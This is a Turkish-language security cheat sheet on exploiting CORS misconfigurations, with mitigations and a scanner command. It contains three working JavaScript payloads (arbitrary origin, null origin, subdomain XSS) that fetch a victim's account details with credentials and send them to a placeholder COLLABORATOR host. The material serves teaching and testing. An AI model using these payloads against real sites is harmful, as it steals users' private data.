CORS Misconfiguration

CORS Nedir?

• Cross-origin resource sharing (CORS), belirli bir domain dışında bulunan kaynaklara kontrollü erişim sağlayan bir tarayıcı mekanizmasıdır.

• Same Origin Policy'i genişletir ve ona esneklik kazandırır.

• Bir web sitesinin CORS politikası kötü yapılandırılmış ve uygulanmışsa, cross-domain saldırıları için de potansiyel sağlar.

Yöntemler

Rastgele Origin

# Request
Origin: https://attacker.com

# Response
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://example.com/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='http://COLLABORATOR/?key='+this.responseText;
    };
</script>

NULL Origin

# Request
Origin: null

# Response
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://example.com/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='http://COLLABORATOR/?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

Subdomain Origin

# Request
Origin: https://example.com

# Response
Access-Control-Allow-Origin: https://subdomain.example.com
Access-Control-Allow-Credentials: true

<script>
    document.location="https://stock.example.com/?productId=<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://example.com/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://COLLABORATOR/?key='%2bthis.responseText; };%3c/script>"
</script>

Önlemler

• Bir web kaynağı hassas bilgiler içeriyorsa, kaynak Access-Control-Allow-Origin başlığında uygun şekilde belirtilmelidir.

• Access-Control-Allow-Origin başlığında belirtilen domainler yalnızca güvenilen siteler olmalıdır. Özellikle, cross-site isteklerden gelen kökenlerin doğrulama yapılmadan dinamik olarak yansıtılması kolayca istismar edilebilir ve bundan kaçınılmalıdır.

• Access-Control-Allow-Origin: null başlığını kullanmaktan kaçının. Dahili belgelerden ve sandbox isteklerinden gelen çapraz kökenli kaynak çağrıları null kökeni belirtebilir. CORS başlıkları, özel ve genel sunucular için güvenilir kaynaklara göre uygun şekilde tanımlanmalıdır.

• Dahili ağlarda joker karakter kullanmaktan kaçının. Dahili tarayıcılar güvenilmeyen harici etki alanlarına erişebildiğinde, dahili kaynakları korumak için yalnızca ağ yapılandırmasına güvenmek yeterli değildir.

• CORS tarayıcı davranışlarını tanımlar ve asla hassas verilerin sunucu tarafı korumasının yerini almaz, bir saldırgan herhangi bir güvenilir kaynaktan gelen bir isteği doğrudan taklit edebilir. Bu nedenle web sunucuları, doğru yapılandırılmış CORS'a ek olarak kimlik doğrulama ve oturum yönetimi gibi hassas veriler üzerinde korumalar uygulamaya devam etmelidir.

Araçlar

Corsy

python corsy.py -u "https://example.com" --headers "Cookie: session=xxxxxxx"

Kaynaklar

Portswigger Academy: https://portswigger.net/web-security/cors